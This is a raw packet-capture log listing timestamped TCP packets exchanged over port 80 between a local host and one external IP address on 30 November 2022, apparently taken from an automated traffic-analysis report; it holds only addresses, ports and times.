                                                            Nov 30, 2022 00:11:10.493988037 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.493988037 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.494023085 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.494066000 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.494110107 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.494153023 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.494174957 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.494174957 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.494195938 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.494250059 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.494316101 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.494362116 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.494374037 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.494374037 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.494411945 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.494453907 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.494498968 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.494540930 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.494554043 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.494554043 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.494585037 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.494626045 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.494641066 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.494676113 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.494725943 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.494731903 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.494779110 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.494822025 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.494867086 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.494921923 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.494923115 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.494942904 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.494993925 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495044947 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495090008 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495132923 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495147943 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.495147943 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.495182037 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495227098 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495270014 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495311022 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495325089 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.495325089 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.495356083 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495398045 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495440006 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495481968 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495493889 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.495493889 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.495533943 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495599985 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495652914 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495696068 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495708942 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.495708942 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.495747089 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495790005 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495831966 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495879889 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495887041 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.495887041 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.495939970 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.495997906 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.496051073 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.496059895 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.496059895 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.496095896 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.496145964 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.496153116 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.496153116 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.496206045 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.496263981 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.496263981 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.496551991 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.496669054 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.496690989 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.496748924 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.496761084 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.496793985 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.496838093 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.496850967 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.496850967 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.496880054 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.496896029 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.496933937 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.496958971 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.496987104 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.497035027 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.497042894 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.497042894 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.497086048 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.497111082 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.497140884 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.497204065 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.497204065 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.766786098 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.766814947 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.766838074 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.766861916 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.766916990 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.766933918 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.766963959 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.766968966 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.766968966 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.766983032 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767024040 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767033100 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767033100 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767041922 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767072916 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767076015 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767076015 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767091990 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767107964 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767115116 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767127991 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767138958 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767138958 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767144918 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767163992 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767191887 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767201900 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767201900 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767210007 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767241001 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767258883 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767263889 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767263889 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767277002 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767292976 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767296076 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767313957 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767327070 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767335892 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767345905 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767348051 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767365932 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767384052 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767395973 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767395973 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767400980 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767435074 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767435074 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767446995 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767465115 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767472982 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767496109 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767497063 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767514944 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767522097 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767533064 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767538071 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767551899 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767570019 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767575979 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767575979 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767595053 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767610073 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767613888 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767632008 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767649889 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767667055 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767684937 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767688036 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767688036 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767703056 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767709970 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767720938 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767735958 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767735958 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767740011 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767759085 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767765045 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767817020 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767822027 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767822027 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767836094 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767853975 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767874002 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767890930 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767890930 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767904997 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767926931 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767937899 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767937899 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767945051 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767962933 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.767978907 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.767978907 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768007040 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768023968 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768040895 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768054962 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768055916 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768059969 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768099070 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768099070 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768105984 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768125057 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768156052 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768156052 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768156052 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768172979 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768191099 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768208027 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768208981 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768208981 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768225908 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768244982 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768265963 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768265963 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768276930 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768295050 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768312931 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768321037 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768321037 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768346071 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768363953 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768369913 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768369913 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768383026 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768387079 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768402100 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768420935 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768429995 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768429995 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768439054 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768452883 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768459082 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768466949 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768479109 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768515110 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768515110 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768523932 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768537045 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768543005 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768562078 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768575907 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768579960 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768598080 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768624067 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768642902 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768661022 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768677950 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768696070 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768713951 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768732071 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768750906 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768781900 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768800974 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768810034 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768810034 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768810034 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768810034 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768810034 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768810034 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768819094 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768837929 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768857002 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768868923 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768868923 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768868923 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768868923 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768868923 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768868923 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768874884 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768894911 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768903017 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768903017 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768914938 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768915892 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768930912 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768932104 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768964052 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.768975019 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768975019 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.768982887 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.769016027 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.769016027 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.769022942 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.769033909 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.769042969 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.769061089 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.769121885 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.769121885 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.769156933 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.769176006 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.769195080 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.769233942 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.769233942 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.769238949 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.769257069 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.769273043 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.769292116 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.769299030 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.769318104 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:10.769321918 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.769563913 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:10.912373066 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:11.019455910 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:11.021420002 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:11.039200068 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.039264917 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.039329052 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.039391994 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.039453030 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.039462090 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:11.039462090 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:11.039514065 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.039575100 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.039633036 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.039691925 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.039697886 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:11.039697886 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:11.039752007 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.039813995 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.039906025 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:11.114639044 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:11.289464951 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.289514065 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.289561987 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.289594889 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.289621115 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:11.289681911 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.289696932 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:11.289715052 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.289750099 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.289800882 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.289815903 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:11.289824009 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.289856911 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.289858103 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:11.289906979 CET4972580192.168.2.6123.253.32.170
                                                            Nov 30, 2022 00:11:11.291245937 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.291282892 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.291315079 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.291348934 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.291382074 CET8049725123.253.32.170192.168.2.6
                                                            Nov 30, 2022 00:11:11.291390896 CET4972580192.168.2.6123.253.32.170
